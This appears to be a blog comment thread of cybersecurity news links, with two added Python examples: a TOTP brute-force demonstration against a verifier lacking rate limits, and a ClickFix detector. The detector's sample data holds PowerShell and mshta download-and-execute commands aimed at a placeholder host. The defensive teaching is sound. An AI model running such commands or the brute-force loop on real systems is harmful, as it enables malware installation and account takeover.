Iranian Hackers Use IOCONTROL Malware to Target OT, IoT Devices in US, Israel
The Iranian threat group CyberAv3ngers has used custom-built malware named IOCONTROL to target IoT and OT devices in the US and Israel.
https://www.securityweek.com/iranian-hackers-use-iocontrol-malware-to-target-ot-iot-devices-in-us-israel/
Tomi Engdahl says:
Malware & Threats
Germany Sinkholes Botnet of 30,000 BadBox-Infected Devices
Germany’s cybersecurity agency BSI has sinkholed a botnet of 30,000 devices shipped with BadBox malware pre-installed.
https://www.securityweek.com/germany-sinkholes-botnet-of-30000-badbox-infected-devices/
At least 30,000 media devices were sold in Germany with pre-installed malware that ensnared them into a botnet, Germany’s Federal Office for Information Security (BSI) said on Thursday.
The infected photo frames and streaming devices were running older Android versions and were infected with the BadBox malware prior to arriving on shelves, the German cybersecurity agency says.
BSI says it has sinkholed the communication between the BadBox bots and their command-and-control (C&C) servers, instructing all internet providers in the country with more than 100,000 subscribers to help redirect traffic to the sinkhole.
The cybersecurity agency says it will work together with the internet providers to identify BadBox bots and alert consumers, and recommends that all infected devices be disconnected from the internet.
BadBox was initially detailed in October last year, after cybersecurity vendor Human Security discovered that over 70,000 Android smartphones, CTV boxes, and tablet devices from at least one Chinese manufacturer were shipped pre-installed with the Triada malware.
As part of the BadBox campaign uncovered by Human Security, roughly 280,000 Android and iOS devices were being abused to conduct various ad-fraud schemes through tens of applications designed to connect to a fake supply-side platform (SSP).
Tomi Engdahl says:
Microsoft Recall is capturing screenshots of sensitive information like credit card and social security numbers
Privacy nightmare is very real, and perfectly avoidable if you disable the feature for good
https://www.techspot.com/news/105943-microsoft-recall-capturing-screenshots-full-sensitive-information-despite.html
Tomi Engdahl says:
Data Protection
Google's Willow Chip Signals the Urgency of Post-Quantum Cryptography Migration
Google’s Willow quantum chip marks a transformative moment in quantum computing development.
https://www.securityweek.com/googles-willow-chip-signals-the-urgency-of-post-quantum-cryptography-migration/
Tomi Engdahl says:
https://www.theregister.com/2024/12/10/artivion_security_incident/
Tomi Engdahl says:
https://cybersecuritynews.com/windows-remote-desktop-services-vulnerability/
Tomi Engdahl says:
https://www.csoonline.com/article/3621101/aws-customers-face-massive-breach-amid-alleged-shinyhunters-regroup.html
Tomi Engdahl says:
Google says its breakthrough quantum chip can’t break modern cryptography / “The Willow chip is not capable of breaking modern cryptography,” Google’s director of quantum tells us.
https://www.theverge.com/2024/12/12/24319879/google-willow-cant-break-rsa-cryptography
Tomi Engdahl says:
33 open-source cybersecurity solutions you didn’t know you needed
Open-source cybersecurity tools provide transparency and flexibility, allowing users to examine and customize the source code to fit specific security needs. These tools make cybersecurity accessible to a broader range of organizations and individuals.
https://www.helpnetsecurity.com/2024/09/10/open-source-cybersec-tools/
Tomi Engdahl says:
Researchers Crack Microsoft Azure MFA in an Hour
A critical flaw in the company’s rate limit for failed sign-in attempts allowed unauthorized access to a user account, including Outlook emails, OneDrive files, Teams chats, Azure Cloud, and more.
https://www.darkreading.com/cyberattacks-data-breaches/researchers-crack-microsoft-azure-mfa-hour
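The headline above turns on a missing rate limit for failed second-factor attempts. As an added illustration of why that matters for a six-digit code (this is not code from the article, from Microsoft, or a reproduction of the researchers' method), here is a minimal RFC 6238 TOTP verifier in Python, first with no attempt limit and then with a failure counter and lockout, plus a brute-force loop that enumerates codes within one time step. The secret, account name, attempt limit and lockout duration are arbitrary assumptions for the example.

```python
import hashlib
import hmac
import struct
from typing import Optional


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP over the time-step counter (30 s steps by default)."""
    return hotp(secret, unix_time // step, digits)


class OtpVerifier:
    """Server-side second-factor check.

    max_failures=None models a verifier that never limits attempts (the failure
    mode the headline describes); a small limit plus a lockout is the hardened
    form. For brevity this accepts only the current time step; real verifiers
    usually accept adjacent steps too, which only widens the attacker's window.
    """

    def __init__(self, secret: bytes, max_failures: Optional[int] = None,
                 lockout_seconds: int = 300):
        self.secret = secret
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self._failures = {}       # account -> consecutive failed attempts
        self._locked_until = {}   # account -> unix time when lockout expires

    def verify(self, account: str, code: str, now: int) -> str:
        """Return "ok", "bad" or "locked" for one submitted code."""
        if self._locked_until.get(account, 0) > now:
            return "locked"
        if hmac.compare_digest(code, totp(self.secret, now)):
            self._failures[account] = 0
            return "ok"
        fails = self._failures.get(account, 0) + 1
        self._failures[account] = fails
        if self.max_failures is not None and fails >= self.max_failures:
            self._locked_until[account] = now + self.lockout_seconds
            self._failures[account] = 0
            return "locked"
        return "bad"


def brute_force(verifier: OtpVerifier, account: str, now: int, digits: int = 6):
    """Attacker who knows only the code length tries every code in order within
    one time step. Returns (succeeded, attempts_made)."""
    attempts = 0
    for guess in range(10 ** digits):
        attempts += 1
        result = verifier.verify(account, str(guess).zfill(digits), now)
        if result == "ok":
            return True, attempts
        if result == "locked":
            return False, attempts
    return False, attempts


# Assumed demo inputs: the RFC 6238 test secret and a fixed timestamp.
DEMO_SECRET = b"12345678901234567890"
DEMO_TIME = 59

if __name__ == "__main__":
    print("no limit:", brute_force(OtpVerifier(DEMO_SECRET), "alice", DEMO_TIME))
    print("limit 10:", brute_force(OtpVerifier(DEMO_SECRET, max_failures=10),
                                   "alice", DEMO_TIME))
```

Without a limit the loop simply walks up to the correct code; with ten allowed failures it is stopped at the tenth guess, so the attacker's per-window success probability drops from 1 to about 10 in a million. Note that limits must be enforced per account across all sessions and clients, otherwise an attacker just opens more sessions.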
Tomi Engdahl says:
A cunning piece of malware is now spreading in Finland – this is how it strikes
https://www.ess.fi/uutissuomalainen/8142078
Traficom's National Cyber Security Centre announced on Friday that the Lumma Stealer malware has been distributed during the autumn through, among other things, pop-up advertisements on websites, fake search engine results and email.
Information-stealing malware is distributed in ways that, in the user's eyes, do not look like malware distribution.
– Particular care should be taken with websites that ask you to run commands on your own device whose real effect or origin you may not understand, says Helinä Turunen, senior specialist at Traficom's National Cyber Security Centre, in the press release.
Regardless of the distribution method, the user is lured into running text copied from the website in the Windows command prompt, after which the malware is installed on the machine. This method is known as "ClickFix", and it is currently used to distribute several malware families.
The malware steals login credentials, cookies used to authenticate to online services and browsing history from victims' web browsers. In addition, the malware can steal cryptocurrency wallets and files found on the victim's device.
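The ClickFix flow described in the comment above (the victim pastes a copied command into the Run dialog or a terminal) leaves a characteristic trace in endpoint telemetry: an interpreter such as powershell.exe or mshta.exe spawned directly by explorer.exe with a download-and-execute command line, often ending in a comment that mimics a CAPTCHA or "I am not a robot" check. The Python below is an added example, not code from Traficom, the article or any vendor: a weighted-indicator detector run over constructed Sysmon-style process-creation records, which also decodes PowerShell -EncodedCommand payloads before matching. The indicator weights, the alert threshold and the sample records are assumptions for illustration.

```python
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Interpreters and living-off-the-land binaries that ClickFix lures have the
# victim launch by pasting text into the Run dialog or a terminal.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# A parent of explorer.exe means the child came from the Run dialog (Win+R) or
# a double-click, i.e. a human typed or pasted the command; terminals likewise.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}

# (name, pattern, weight). Weights are an assumption for this example.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), 2),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I), 3),
    ("remote_fetch", re.compile(
        r"downloadstring|invoke-webrequest|\biwr\b|\bmshta\b\s+https?://", re.I), 3),
    ("encoded_command", re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("captcha_comment", re.compile(r"#.*?(robot|captcha|verif|human)", re.I), 3),
    ("url", re.compile(r"https?://", re.I), 1),
]
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
ALERT_THRESHOLD = 5   # assumed; tune against your own baseline


@dataclass
class Alert:
    index: int
    image: str
    score: int
    hits: list
    decoded: Optional[str]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; decode it so
    indicators are matched against what would actually execute."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict):
    """Return (score, hits, decoded_payload) for one process-creation record."""
    if _basename(event["Image"]) not in INTERPRETERS:
        return 0, [], None
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            hits.append(name)
    if _basename(event["ParentImage"]) in INTERACTIVE_PARENTS:
        score += 2
        hits.append("interactive_parent")
    return score, hits, decoded


def detect(events):
    """Run the scorer over a list of records and return the alerts."""
    alerts = []
    for i, ev in enumerate(events):
        score, hits, decoded = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append(Alert(i, _basename(ev["Image"]), score, hits, decoded))
    return alerts


# Constructed sample payload and records (not real telemetry). The first three
# mimic ClickFix lures; the rest are benign activity for comparison.
_ENCODED_PAYLOAD = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1')"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://example.invalid/verify.txt' "
                    "-UseBasicParsing)\" # I am not a robot - reCAPTCHA Verification ID: 7811"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/fix.hta # Verification step 1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + _ENCODED_PAYLOAD},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoLogo -ExecutionPolicy Bypass -File C:\build\build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"event {a.index}: {a.image} score={a.score} hits={a.hits}")
```

On the endpoint itself, the Run dialog keeps a history of what was typed or pasted under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is a quick place to confirm a ClickFix execution during triage.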
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/russian-cyber-spies-hide-behind-other-hackers-to-target-ukraine/
Tomi Engdahl says:
Police warn hundreds of Finns registered on crime-as-a-service websites
US and EU authorities have seized 63 websites considered the world’s biggest purveyors of services used in illegal distributed denial of service (DDoS) attacks
https://yle.fi/a/74-20130701
Tomi Engdahl says:
Open-source projects are drowning in a new problem – "fundamental changes are needed"
Suvi Korhonen, 11.12.2024 13:24
Reporting vulnerabilities benefits open-source communities, as long as reports are sent only for good reason and are clearly written. Developers hope that bug hunters would prepare their reports carefully.
https://www.tivi.fi/uutiset/avoimen-koodin-projektit-hukkuvat-uuteen-ongelmaan-tarvitaan-perusteellisia-muutoksia/ab2fe1a2-c738-4bed-ab1a-16523065b3b6
Tomi Engdahl says:
https://traficom.fi/fi/ajankohtaista/tilaisuudet/uusi-kyberkestavyyssaados-tulossa-nyt-aika-valmistautua-webinaari
Tomi Engdahl says:
https://www.techradar.com/vpn/vpn-privacy-security/russia-disconnects-several-regions-from-the-global-internet-to-test-its-sovereign-net